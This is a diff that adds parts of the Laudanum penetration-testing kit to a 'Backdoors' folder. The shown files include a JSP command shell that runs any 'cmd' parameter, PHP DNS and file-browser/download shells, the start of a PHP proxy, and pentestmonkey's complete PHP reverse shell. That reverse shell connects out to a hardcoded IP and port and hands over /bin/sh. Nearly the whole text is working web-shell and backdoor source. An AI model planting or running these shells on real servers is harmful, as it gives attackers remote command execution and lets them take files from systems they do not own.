if (request.getRemoteAddr() != "4.4.4.4") {
|
||||||
|
response.sendError(HttpServletResponse.SC_NOT_FOUND)
|
||||||
|
return;
|
||||||
|
}
|
||||||
|
|
||||||
|
%>
|
||||||
|
<HTML>
|
||||||
|
<TITLE>Laudanum JSP Shell</TITLE>
|
||||||
|
<BODY>
|
||||||
|
Commands with JSP
|
||||||
|
<FORM METHOD="GET" NAME="myform" ACTION="">
|
||||||
|
<INPUT TYPE="text" NAME="cmd">
|
||||||
|
<INPUT TYPE="submit" VALUE="Send"><br/>
|
||||||
|
If you use this against a Windows box you may need to prefix your command with cmd.exe /c
|
||||||
|
</FORM>
|
||||||
|
<pre>
|
||||||
|
<%
|
||||||
|
if (request.getParameter("cmd") != null) {
|
||||||
|
out.println("Command: " + request.getParameter("cmd") + "<BR>");
|
||||||
|
Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
|
||||||
|
OutputStream os = p.getOutputStream();
|
||||||
|
InputStream in = p.getInputStream();
|
||||||
|
DataInputStream dis = new DataInputStream(in);
|
||||||
|
String disr = dis.readLine();
|
||||||
|
while ( disr != null ) {
|
||||||
|
out.println(disr);
|
||||||
|
disr = dis.readLine();
|
||||||
|
}
|
||||||
|
}
|
||||||
|
%>
|
||||||
|
</pre>
|
||||||
|
<hr/>
|
||||||
|
<address>
|
||||||
|
Copyright © 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
|
||||||
|
Written by Tim Medin.<br/>
|
||||||
|
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
|
||||||
|
</address>
|
||||||
|
</BODY></HTML>
|
||||||
BIN
Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/._.DS_Store
Normal file
BIN
Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/._.DS_Store
Normal file
Binary file not shown.
161
Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/dns.php
Normal file
161
Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/dns.php
Normal file
@@ -0,0 +1,161 @@
|
|||||||
|
<?php
|
||||||
|
/* *****************************************************************************
|
||||||
|
***
|
||||||
|
*** Laudanum Project
|
||||||
|
*** A Collection of Injectable Files used during a Penetration Test
|
||||||
|
***
|
||||||
|
*** More information is available at:
|
||||||
|
*** http://laudanum.secureideas.net
|
||||||
|
*** laudanum@secureideas.net
|
||||||
|
***
|
||||||
|
*** Project Leads:
|
||||||
|
*** Kevin Johnson <kjohnson@secureideas.net
|
||||||
|
*** Tim Medin <tim@securitywhole.com>
|
||||||
|
***
|
||||||
|
*** Copyright 2012 by Kevin Johnson and the Laudanum Team
|
||||||
|
***
|
||||||
|
********************************************************************************
|
||||||
|
***
|
||||||
|
*** This file provides access to DNS on the system.
|
||||||
|
*** Written by Tim Medin <tim@securitywhole.com>
|
||||||
|
***
|
||||||
|
********************************************************************************
|
||||||
|
*** This program is free software; you can redistribute it and/or
|
||||||
|
*** modify it under the terms of the GNU General Public License
|
||||||
|
*** as published by the Free Software Foundation; either version 2
|
||||||
|
*** of the License, or (at your option) any later version.
|
||||||
|
***
|
||||||
|
*** This program is distributed in the hope that it will be useful,
|
||||||
|
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
*** GNU General Public License for more details.
|
||||||
|
***
|
||||||
|
*** You can get a copy of the GNU General Public License from this
|
||||||
|
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
|
||||||
|
*** You can also write to the Free Software Foundation, Inc., 59 Temple
|
||||||
|
*** Place - Suite 330, Boston, MA 02111-1307, USA.
|
||||||
|
***
|
||||||
|
***************************************************************************** */
|
||||||
|
|
||||||
|
// ***************** Config entries below ***********************
|
||||||
|
|
||||||
|
// IPs are enterable as individual addresses TODO: add CIDR support
|
||||||
|
$allowedIPs = array("19.168.2.16", "192.168.1.100");
|
||||||
|
|
||||||
|
# *********** No editable content below this line **************
|
||||||
|
|
||||||
|
$allowed = 0;
|
||||||
|
foreach ($allowedIPs as $IP) {
|
||||||
|
if ($_SERVER["REMOTE_ADDR"] == $IP)
|
||||||
|
$allowed = 1;
|
||||||
|
}
|
||||||
|
|
||||||
|
if ($allowed == 0) {
|
||||||
|
header("HTTP/1.0 404 Not Found");
|
||||||
|
die();
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
/* This error handler will turn all notices, warnings, and errors into fatal
|
||||||
|
* errors, unless they have been suppressed with the @-operator. */
|
||||||
|
function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
|
||||||
|
/* The @-opertor (used with chdir() below) temporarely makes
|
||||||
|
* error_reporting() return zero, and we don't want to die in that case.
|
||||||
|
* We do note the error in the output, though. */
|
||||||
|
if (error_reporting() == 0) {
|
||||||
|
$_SESSION['output'] .= $errstr . "\n";
|
||||||
|
} else {
|
||||||
|
die('<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|
||||||
|
"http://www.w3.org/TR/html4/strict.dtd">
|
||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<title>Laudanum PHP DNS Access</title>
|
||||||
|
</head>
|
||||||
|
<body>
|
||||||
|
<h1>Fatal Error!</h1>
|
||||||
|
<p><b>' . $errstr . '</b></p>
|
||||||
|
<p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>
|
||||||
|
|
||||||
|
<hr>
|
||||||
|
<address>
|
||||||
|
Copyright © 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
|
||||||
|
Written by Tim Medin.<br/>
|
||||||
|
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
|
||||||
|
</address>
|
||||||
|
|
||||||
|
</body>
|
||||||
|
</html>');
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
set_error_handler('error_handler');
|
||||||
|
|
||||||
|
|
||||||
|
/* Initialize some variables we need again and again. */
|
||||||
|
$query = isset($_POST['query']) ? $_POST['query'] : '';
|
||||||
|
$type = isset($_POST['type']) ? $_POST['type'] : 'DNS_ANY';
|
||||||
|
?>
|
||||||
|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|
||||||
|
"http://www.w3.org/TR/html4/strict.dtd">
|
||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<title>Laudanum PHP DNS Access</title>
|
||||||
|
<link rel="stylesheet" href="style.css" type="text/css">
|
||||||
|
|
||||||
|
<script type="text/javascript">
|
||||||
|
function init() {
|
||||||
|
document.dns.query.focus();
|
||||||
|
}
|
||||||
|
</script>
|
||||||
|
</head>
|
||||||
|
<body onload="init()">
|
||||||
|
|
||||||
|
<h1>DNS Query 0.1</h1>
|
||||||
|
<form name="dns" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="POST">
|
||||||
|
<fieldset>
|
||||||
|
<legend>DNS Lookup:</legend>
|
||||||
|
<p>Query:<input name="query" type="text">
|
||||||
|
Type:<select name="type">
|
||||||
|
<?php
|
||||||
|
$types = array("A" => DNS_A, "CNAME" => DNS_CNAME, "HINFO" => DNS_HINFO, "MX" => DNS_MX, "NS" => DNS_NS, "PTR" => DNS_PTR, "SOA" => DNS_SOA, "TXT" => DNS_TXT, "AAAA" => DNS_AAAA, "SRV" => DNS_SRV, "NAPTR" => DNS_NAPTR, "A6" => DNS_A6, "ALL" => DNS_ALL, "ANY" => DNS_ANY);
|
||||||
|
|
||||||
|
if (!in_array($type, array_keys($types))) {
|
||||||
|
$type = "ANY";
|
||||||
|
}
|
||||||
|
|
||||||
|
$validtype = 0;
|
||||||
|
foreach (array_keys($types) as $t) {
|
||||||
|
echo " <option value=\"$t\"" . (($type == $t) ? " SELECTED" : "") . ">$t</option>\n";
|
||||||
|
}
|
||||||
|
?>
|
||||||
|
|
||||||
|
</select>
|
||||||
|
<input type="submit" value="Submit">
|
||||||
|
</fieldset>
|
||||||
|
</form>
|
||||||
|
|
||||||
|
|
||||||
|
<?php
|
||||||
|
if ($query != '')
|
||||||
|
{
|
||||||
|
$result = dns_get_record($query, $types[$type], $authns, $addtl);
|
||||||
|
echo "<pre><results>";
|
||||||
|
echo "Result = ";
|
||||||
|
print_r($result);
|
||||||
|
echo "Auth NS = ";
|
||||||
|
print_r($authns);
|
||||||
|
echo "Additional = ";
|
||||||
|
print_r($addtl);
|
||||||
|
echo "</results></pre>";
|
||||||
|
}
|
||||||
|
?>
|
||||||
|
<hr>
|
||||||
|
<address>
|
||||||
|
Copyright © 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
|
||||||
|
Written by Tim Medin.<br/>
|
||||||
|
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
|
||||||
|
</address>
|
||||||
|
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
195
Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/file.php
Normal file
195
Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/file.php
Normal file
@@ -0,0 +1,195 @@
|
|||||||
|
<?php
|
||||||
|
/* *****************************************************************************
|
||||||
|
***
|
||||||
|
*** Laudanum Project
|
||||||
|
*** A Collection of Injectable Files used during a Penetration Test
|
||||||
|
***
|
||||||
|
*** More information is available at:
|
||||||
|
*** http://laudanum.secureideas.net
|
||||||
|
*** laudanum@secureideas.net
|
||||||
|
***
|
||||||
|
*** Project Leads:
|
||||||
|
*** Kevin Johnson <kjohnson@secureideas.net
|
||||||
|
*** Tim Medin <tim@securitywhole.com>
|
||||||
|
***
|
||||||
|
*** Copyright 2012 by Kevin Johnson and the Laudanum Team
|
||||||
|
***
|
||||||
|
********************************************************************************
|
||||||
|
***
|
||||||
|
*** This file allows browsing of the file system.
|
||||||
|
*** Written by Tim Medin <tim@securitywhole.com>
|
||||||
|
***
|
||||||
|
********************************************************************************
|
||||||
|
*** This program is free software; you can redistribute it and/or
|
||||||
|
*** modify it under the terms of the GNU General Public License
|
||||||
|
*** as published by the Free Software Foundation; either version 2
|
||||||
|
*** of the License, or (at your option) any later version.
|
||||||
|
***
|
||||||
|
*** This program is distributed in the hope that it will be useful,
|
||||||
|
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
*** GNU General Public License for more details.
|
||||||
|
***
|
||||||
|
*** You can get a copy of the GNU General Public License from this
|
||||||
|
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
|
||||||
|
*** You can also write to the Free Software Foundation, Inc., 59 Temple
|
||||||
|
*** Place - Suite 330, Boston, MA 02111-1307, USA.
|
||||||
|
***
|
||||||
|
***************************************************************************** */
|
||||||
|
|
||||||
|
// ***************** Config entries below ***********************
|
||||||
|
|
||||||
|
// IPs are enterable as individual addresses TODO: add CIDR support
|
||||||
|
$allowedIPs = array("192.168.1.1","127.0.0.1");
|
||||||
|
|
||||||
|
# *********** No editable content below this line **************
|
||||||
|
|
||||||
|
$allowed = 0;
|
||||||
|
foreach ($allowedIPs as $IP) {
|
||||||
|
if ($_SERVER["REMOTE_ADDR"] == $IP)
|
||||||
|
$allowed = 1;
|
||||||
|
}
|
||||||
|
|
||||||
|
if ($allowed == 0) {
|
||||||
|
header("HTTP/1.0 404 Not Found");
|
||||||
|
die();
|
||||||
|
}
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
|
/* This error handler will turn all notices, warnings, and errors into fatal
|
||||||
|
* errors, unless they have been suppressed with the @-operator. */
|
||||||
|
function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
|
||||||
|
/* The @-opertor (used with chdir() below) temporarely makes
|
||||||
|
* error_reporting() return zero, and we don't want to die in that case.
|
||||||
|
* We do note the error in the output, though. */
|
||||||
|
if (error_reporting() == 0) {
|
||||||
|
$_SESSION['output'] .= $errstr . "\n";
|
||||||
|
} else {
|
||||||
|
die('<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|
||||||
|
"http://www.w3.org/TR/html4/strict.dtd">
|
||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<title>Laudanum PHP File Browser</title>
|
||||||
|
</head>
|
||||||
|
<body>
|
||||||
|
<h1>Fatal Error!</h1>
|
||||||
|
<p><b>' . $errstr . '</b></p>
|
||||||
|
<p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>
|
||||||
|
|
||||||
|
<hr>
|
||||||
|
<address>
|
||||||
|
Copyright © 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
|
||||||
|
Written by Tim Medin.<br/>
|
||||||
|
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
|
||||||
|
</address>
|
||||||
|
|
||||||
|
</body>
|
||||||
|
</html>');
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
set_error_handler('error_handler');
|
||||||
|
|
||||||
|
|
||||||
|
/* Initialize some variables we need again and again. */
|
||||||
|
$dir = isset($_GET["dir"]) ? $_GET["dir"] : ".";
|
||||||
|
$file = isset($_GET["file"]) ? $_GET["file"] : "";
|
||||||
|
|
||||||
|
if ($file != "") {
|
||||||
|
if(file_exists($file)) {
|
||||||
|
|
||||||
|
$s = split("/", $file);
|
||||||
|
$filename = $s[count($s) - 1];
|
||||||
|
header("Content-type: application/x-download");
|
||||||
|
header("Content-Length: ".filesize($file));
|
||||||
|
header("Content-Disposition: attachment; filename=\"".$filename."\"");
|
||||||
|
readfile($file);
|
||||||
|
die();
|
||||||
|
}
|
||||||
|
}
|
||||||
|
?>
|
||||||
|
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|
||||||
|
"http://www.w3.org/TR/html4/strict.dtd">
|
||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<title>Laudanum File Browser</title>
|
||||||
|
<link rel="stylesheet" href="style.css" type="text/css">
|
||||||
|
|
||||||
|
<script type="text/javascript">
|
||||||
|
</script>
|
||||||
|
</head>
|
||||||
|
<body onload="init()">
|
||||||
|
|
||||||
|
<h1>Laudanum File Browser 0.1</h1>
|
||||||
|
<a href="<?php echo $_SERVER['PHP_SELF'] ?>">Home</a><br/>
|
||||||
|
|
||||||
|
<?php
|
||||||
|
// get the actual path, add an ending / if necessary
|
||||||
|
$curdir = realpath($dir);
|
||||||
|
$curdir .= substr($curdir, -1) != "/" ? "/" : "";
|
||||||
|
|
||||||
|
$dirs = split("/",$curdir);
|
||||||
|
|
||||||
|
// Create the breadcrumb
|
||||||
|
echo "<h2>Directory listing of <a href=\"" . $_SERVER['PHP_SELF'] . "?dir=/\">/</a> ";
|
||||||
|
$breadcrumb = '/';
|
||||||
|
foreach ($dirs as $d) {
|
||||||
|
if ($d != '') {
|
||||||
|
$breadcrumb .= $d . "/";
|
||||||
|
echo "<a href=\"" . $_SERVER['PHP_SELF'] . "?dir=" . urlencode($breadcrumb) . "\">$d/</a> ";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
echo "</h2>";
|
||||||
|
|
||||||
|
// translate .. to a real dir
|
||||||
|
$parentdir = "";
|
||||||
|
for ($i = 0; $i < count($dirs) - 2; $i++) {
|
||||||
|
$parentdir .= $dirs[$i] . "/";
|
||||||
|
}
|
||||||
|
|
||||||
|
echo "<table>";
|
||||||
|
echo "<tr><th>Name</th><th>Date</th><th>Size</th></tr>";
|
||||||
|
echo "<tr><td><a href=\"" . $_SERVER['PHP_SELF'] . "?dir=$parentdir\">../</a></td><td> </td><td> </td></tr>";
|
||||||
|
|
||||||
|
//get listing, separate into directories and files
|
||||||
|
$listingfiles = array();
|
||||||
|
$listingdirs = array();
|
||||||
|
|
||||||
|
if ($handle = @opendir($curdir)) {
|
||||||
|
while ($o = readdir($handle)) {
|
||||||
|
if ($o == "." || $o == "..") continue;
|
||||||
|
if (@filetype($curdir . $o) == "dir") {
|
||||||
|
$listingdirs[] = $o . "/";
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
$listingfiles[] = $o;
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
@natcasesort($listingdirs);
|
||||||
|
@natcasesort($listingfiles);
|
||||||
|
|
||||||
|
//display directories
|
||||||
|
foreach ($listingdirs as $f) {
|
||||||
|
echo "<tr><td><a href=\"" . $_SERVER['PHP_SELF'] . "?dir=" . urlencode($curdir . $f) . "\">" . $f . "</a></td><td align=\"right\">" . "</td><td> <td></tr>";
|
||||||
|
}
|
||||||
|
|
||||||
|
//display files
|
||||||
|
foreach ($listingfiles as $f) {
|
||||||
|
echo "<tr><td><a href=\"" . $_SERVER['PHP_SELF'] . "?file=" . urlencode($curdir . $f) . "\">" . $f . "</a></td><td align=\"right\">" . "</td><td align=\"right\">" . number_format(@filesize($curdir . $f)) . "<td></tr>";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
else {
|
||||||
|
echo "<tr><td colspan=\"3\"><h1>Can't open directory</h1></td></tr>";
|
||||||
|
}
|
||||||
|
?>
|
||||||
|
</table>
|
||||||
|
<hr>
|
||||||
|
<address>
|
||||||
|
Copyright © 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
|
||||||
|
Written by Tim Medin.<br/>
|
||||||
|
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
|
||||||
|
</address>
|
||||||
|
</body>
|
||||||
|
</html>
|
||||||
@@ -0,0 +1,192 @@
|
|||||||
|
<?php
|
||||||
|
// php-reverse-shell - A Reverse Shell implementation in PHP
|
||||||
|
// Copyright (C) 2007 pentestmonkey@pentestmonkey.net
|
||||||
|
//
|
||||||
|
// This tool may be used for legal purposes only. Users take full responsibility
|
||||||
|
// for any actions performed using this tool. The author accepts no liability
|
||||||
|
// for damage caused by this tool. If these terms are not acceptable to you, then
|
||||||
|
// do not use this tool.
|
||||||
|
//
|
||||||
|
// In all other respects the GPL version 2 applies:
|
||||||
|
//
|
||||||
|
// This program is free software; you can redistribute it and/or modify
|
||||||
|
// it under the terms of the GNU General Public License version 2 as
|
||||||
|
// published by the Free Software Foundation.
|
||||||
|
//
|
||||||
|
// This program is distributed in the hope that it will be useful,
|
||||||
|
// but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
// GNU General Public License for more details.
|
||||||
|
//
|
||||||
|
// You should have received a copy of the GNU General Public License along
|
||||||
|
// with this program; if not, write to the Free Software Foundation, Inc.,
|
||||||
|
// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
|
||||||
|
//
|
||||||
|
// This tool may be used for legal purposes only. Users take full responsibility
|
||||||
|
// for any actions performed using this tool. If these terms are not acceptable to
|
||||||
|
// you, then do not use this tool.
|
||||||
|
//
|
||||||
|
// You are encouraged to send comments, improvements or suggestions to
|
||||||
|
// me at pentestmonkey@pentestmonkey.net
|
||||||
|
//
|
||||||
|
// Description
|
||||||
|
// -----------
|
||||||
|
// This script will make an outbound TCP connection to a hardcoded IP and port.
|
||||||
|
// The recipient will be given a shell running as the current user (apache normally).
|
||||||
|
//
|
||||||
|
// Limitations
|
||||||
|
// -----------
|
||||||
|
// proc_open and stream_set_blocking require PHP version 4.3+, or 5+
|
||||||
|
// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.
|
||||||
|
// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.
|
||||||
|
//
|
||||||
|
// Usage
|
||||||
|
// -----
|
||||||
|
// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.
|
||||||
|
|
||||||
|
set_time_limit (0);
|
||||||
|
$VERSION = "1.0";
|
||||||
|
$ip = '10.2.2.1'; // CHANGE THIS
|
||||||
|
$port = 8888; // CHANGE THIS
|
||||||
|
$chunk_size = 1400;
|
||||||
|
$write_a = null;
|
||||||
|
$error_a = null;
|
||||||
|
$shell = 'uname -a; w; id; /bin/sh -i';
|
||||||
|
$daemon = 0;
|
||||||
|
$debug = 0;
|
||||||
|
|
||||||
|
//
|
||||||
|
// Daemonise ourself if possible to avoid zombies later
|
||||||
|
//
|
||||||
|
|
||||||
|
// pcntl_fork is hardly ever available, but will allow us to daemonise
|
||||||
|
// our php process and avoid zombies. Worth a try...
|
||||||
|
if (function_exists('pcntl_fork')) {
|
||||||
|
// Fork and have the parent process exit
|
||||||
|
$pid = pcntl_fork();
|
||||||
|
|
||||||
|
if ($pid == -1) {
|
||||||
|
printit("ERROR: Can't fork");
|
||||||
|
exit(1);
|
||||||
|
}
|
||||||
|
|
||||||
|
if ($pid) {
|
||||||
|
exit(0); // Parent exits
|
||||||
|
}
|
||||||
|
|
||||||
|
// Make the current process a session leader
|
||||||
|
// Will only succeed if we forked
|
||||||
|
if (posix_setsid() == -1) {
|
||||||
|
printit("Error: Can't setsid()");
|
||||||
|
exit(1);
|
||||||
|
}
|
||||||
|
|
||||||
|
$daemon = 1;
|
||||||
|
} else {
|
||||||
|
printit("WARNING: Failed to daemonise. This is quite common and not fatal.");
|
||||||
|
}
|
||||||
|
|
||||||
|
// Change to a safe directory
|
||||||
|
chdir("/");
|
||||||
|
|
||||||
|
// Remove any umask we inherited
|
||||||
|
umask(0);
|
||||||
|
|
||||||
|
//
|
||||||
|
// Do the reverse shell...
|
||||||
|
//
|
||||||
|
|
||||||
|
// Open reverse connection
|
||||||
|
$sock = fsockopen($ip, $port, $errno, $errstr, 30);
|
||||||
|
if (!$sock) {
|
||||||
|
printit("$errstr ($errno)");
|
||||||
|
exit(1);
|
||||||
|
}
|
||||||
|
|
||||||
|
// Spawn shell process
|
||||||
|
$descriptorspec = array(
|
||||||
|
0 => array("pipe", "r"), // stdin is a pipe that the child will read from
|
||||||
|
1 => array("pipe", "w"), // stdout is a pipe that the child will write to
|
||||||
|
2 => array("pipe", "w") // stderr is a pipe that the child will write to
|
||||||
|
);
|
||||||
|
|
||||||
|
$process = proc_open($shell, $descriptorspec, $pipes);
|
||||||
|
|
||||||
|
if (!is_resource($process)) {
|
||||||
|
printit("ERROR: Can't spawn shell");
|
||||||
|
exit(1);
|
||||||
|
}
|
||||||
|
|
||||||
|
// Set everything to non-blocking
|
||||||
|
// Reason: Occsionally reads will block, even though stream_select tells us they won't
|
||||||
|
stream_set_blocking($pipes[0], 0);
|
||||||
|
stream_set_blocking($pipes[1], 0);
|
||||||
|
stream_set_blocking($pipes[2], 0);
|
||||||
|
stream_set_blocking($sock, 0);
|
||||||
|
|
||||||
|
printit("Successfully opened reverse shell to $ip:$port");
|
||||||
|
|
||||||
|
while (1) {
|
||||||
|
// Check for end of TCP connection
|
||||||
|
if (feof($sock)) {
|
||||||
|
printit("ERROR: Shell connection terminated");
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
|
||||||
|
// Check for end of STDOUT
|
||||||
|
if (feof($pipes[1])) {
|
||||||
|
printit("ERROR: Shell process terminated");
|
||||||
|
break;
|
||||||
|
}
|
||||||
|
|
||||||
|
// Wait until a command is end down $sock, or some
|
||||||
|
// command output is available on STDOUT or STDERR
|
||||||
|
$read_a = array($sock, $pipes[1], $pipes[2]);
|
||||||
|
$num_changed_sockets = stream_select($read_a, $write_a, $error_a, null);
|
||||||
|
|
||||||
|
// If we can read from the TCP socket, send
|
||||||
|
// data to process's STDIN
|
||||||
|
if (in_array($sock, $read_a)) {
|
||||||
|
if ($debug) printit("SOCK READ");
|
||||||
|
$input = fread($sock, $chunk_size);
|
||||||
|
if ($debug) printit("SOCK: $input");
|
||||||
|
fwrite($pipes[0], $input);
|
||||||
|
}
|
||||||
|
|
||||||
|
// If we can read from the process's STDOUT
|
||||||
|
// send data down tcp connection
|
||||||
|
if (in_array($pipes[1], $read_a)) {
|
||||||
|
if ($debug) printit("STDOUT READ");
|
||||||
|
$input = fread($pipes[1], $chunk_size);
|
||||||
|
if ($debug) printit("STDOUT: $input");
|
||||||
|
fwrite($sock, $input);
|
||||||
|
}
|
||||||
|
|
||||||
|
// If we can read from the process's STDERR
|
||||||
|
// send data down tcp connection
|
||||||
|
if (in_array($pipes[2], $read_a)) {
|
||||||
|
if ($debug) printit("STDERR READ");
|
||||||
|
$input = fread($pipes[2], $chunk_size);
|
||||||
|
if ($debug) printit("STDERR: $input");
|
||||||
|
fwrite($sock, $input);
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
fclose($sock);
|
||||||
|
fclose($pipes[0]);
|
||||||
|
fclose($pipes[1]);
|
||||||
|
fclose($pipes[2]);
|
||||||
|
proc_close($process);
|
||||||
|
|
||||||
|
// Like print, but does nothing if we've daemonised ourself
|
||||||
|
// (I can't figure out how to redirect STDOUT like a proper daemon)
|
||||||
|
function printit ($string) {
|
||||||
|
if (!$daemon) {
|
||||||
|
print "$string\n";
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
?>
|
||||||
|
|
||||||
|
|
||||||
|
|
||||||
351
Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/proxy.php
Normal file
351
Scripts/Backdoors/Web Backdoors/laudanum-0.8/php/proxy.php
Normal file
@@ -0,0 +1,351 @@
|
|||||||
|
<?php
|
||||||
|
ini_set('session.use_cookies', '0');
|
||||||
|
/* *****************************************************************************
|
||||||
|
***
|
||||||
|
*** Laudanum Project
|
||||||
|
*** A Collection of Injectable Files used during a Penetration Test
|
||||||
|
***
|
||||||
|
*** More information is available at:
|
||||||
|
*** http://laudanum.secureideas.net
|
||||||
|
*** laudanum@secureideas.net
|
||||||
|
***
|
||||||
|
*** Project Leads:
|
||||||
|
*** Kevin Johnson <kjohnson@secureideas.net
|
||||||
|
*** Tim Medin <tim@securitywhole.com>
|
||||||
|
***
|
||||||
|
*** Copyright 2012 by Kevin Johnson and the Laudanum Team
|
||||||
|
***
|
||||||
|
********************************************************************************
|
||||||
|
***
|
||||||
|
*** This file allows browsing of the file system.
|
||||||
|
*** Written by Tim Medin <tim@securitywhole.com>
|
||||||
|
***
|
||||||
|
********************************************************************************
|
||||||
|
*** This program is free software; you can redistribute it and/or
|
||||||
|
*** modify it under the terms of the GNU General Public License
|
||||||
|
*** as published by the Free Software Foundation; either version 2
|
||||||
|
*** of the License, or (at your option) any later version.
|
||||||
|
***
|
||||||
|
*** This program is distributed in the hope that it will be useful,
|
||||||
|
*** but WITHOUT ANY WARRANTY; without even the implied warranty of
|
||||||
|
*** MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
|
||||||
|
*** GNU General Public License for more details.
|
||||||
|
***
|
||||||
|
*** You can get a copy of the GNU General Public License from this
|
||||||
|
*** address: http://www.gnu.org/copyleft/gpl.html#SEC1
|
||||||
|
*** You can also write to the Free Software Foundation, Inc., 59 Temple
|
||||||
|
*** Place - Suite 330, Boston, MA 02111-1307, USA.
|
||||||
|
***
|
||||||
|
***************************************************************************** */
|
||||||
|
|
||||||
|
// TODO: If the remote site uses a sessionid it collides with the php sessionid cookie from this page
|
||||||
|
// figure out how to reuse sessionid from the remote site
|
||||||
|
|
||||||
|
// ***************** Config entries below ***********************
|
||||||
|
|
||||||
|
// IPs are enterable as individual addresses TODO: add CIDR support
|
||||||
|
$allowedIPs = array("19.168.2.16", "192.168.1.100","127.0.0.1","192.168.10.129","192.168.10.1");
|
||||||
|
|
||||||
|
# *********** No editable content below this line **************
|
||||||
|
|
||||||
|
$allowed = 0;
|
||||||
|
foreach ($allowedIPs as $IP) {
|
||||||
|
if ($_SERVER["REMOTE_ADDR"] == $IP)
|
||||||
|
$allowed = 1;
|
||||||
|
}
|
||||||
|
|
||||||
|
if ($allowed == 0) {
|
||||||
|
header("HTTP/1.0 404 Not Found");
|
||||||
|
die();
|
||||||
|
}
|
||||||
|
|
||||||
|
/* This error handler will turn all notices, warnings, and errors into fatal
|
||||||
|
* errors, unless they have been suppressed with the @-operator. */
|
||||||
|
function error_handler($errno, $errstr, $errfile, $errline, $errcontext) {
|
||||||
|
/* The @-opertor (used with chdir() below) temporarely makes
|
||||||
|
* error_reporting() return zero, and we don't want to die in that case.
|
||||||
|
* We do note the error in the output, though. */
|
||||||
|
if (error_reporting() == 0) {
|
||||||
|
$_SESSION['output'] .= $errstr . "\n";
|
||||||
|
} else {
|
||||||
|
die('<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN"
|
||||||
|
"http://www.w3.org/TR/html4/strict.dtd">
|
||||||
|
<html>
|
||||||
|
<head>
|
||||||
|
<title>Laudanum PHP Proxy</title>
|
||||||
|
</head>
|
||||||
|
<body>
|
||||||
|
<h1>Fatal Error!</h1>
|
||||||
|
<p><b>' . $errstr . '</b></p>
|
||||||
|
<p>in <b>' . $errfile . '</b>, line <b>' . $errline . '</b>.</p>
|
||||||
|
|
||||||
|
<hr>
|
||||||
|
<address>
|
||||||
|
Copyright © 2012, <a href="mailto:laudanum@secureideas.net">Kevin Johnson</a> and the Laudanum team.<br/>
|
||||||
|
Written by Tim Medin.<br/>
|
||||||
|
Get the latest version at <a href="http://laudanum.secureideas.net">laudanum.secureideas.net</a>.
|
||||||
|
</address>
|
||||||
|
|
||||||
|
</body>
|
||||||
|
</html>');
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|
||||||
|
set_error_handler('error_handler');
|
||||||
|
|
||||||
|
function geturlarray($u) {
|
||||||
|
// creates the url array, addes a scheme if it is missing and retries parsing
|
||||||
|
$o = parse_url($u);
|
||||||
|
if (!isset($o["scheme"])) { $o = parse_url("http://" . $u); }
|
||||||
|
if (!isset($o["path"])) { $o["path"] = "/"; }
|
||||||
|
return $o;
|
||||||
|
}
|
||||||
|
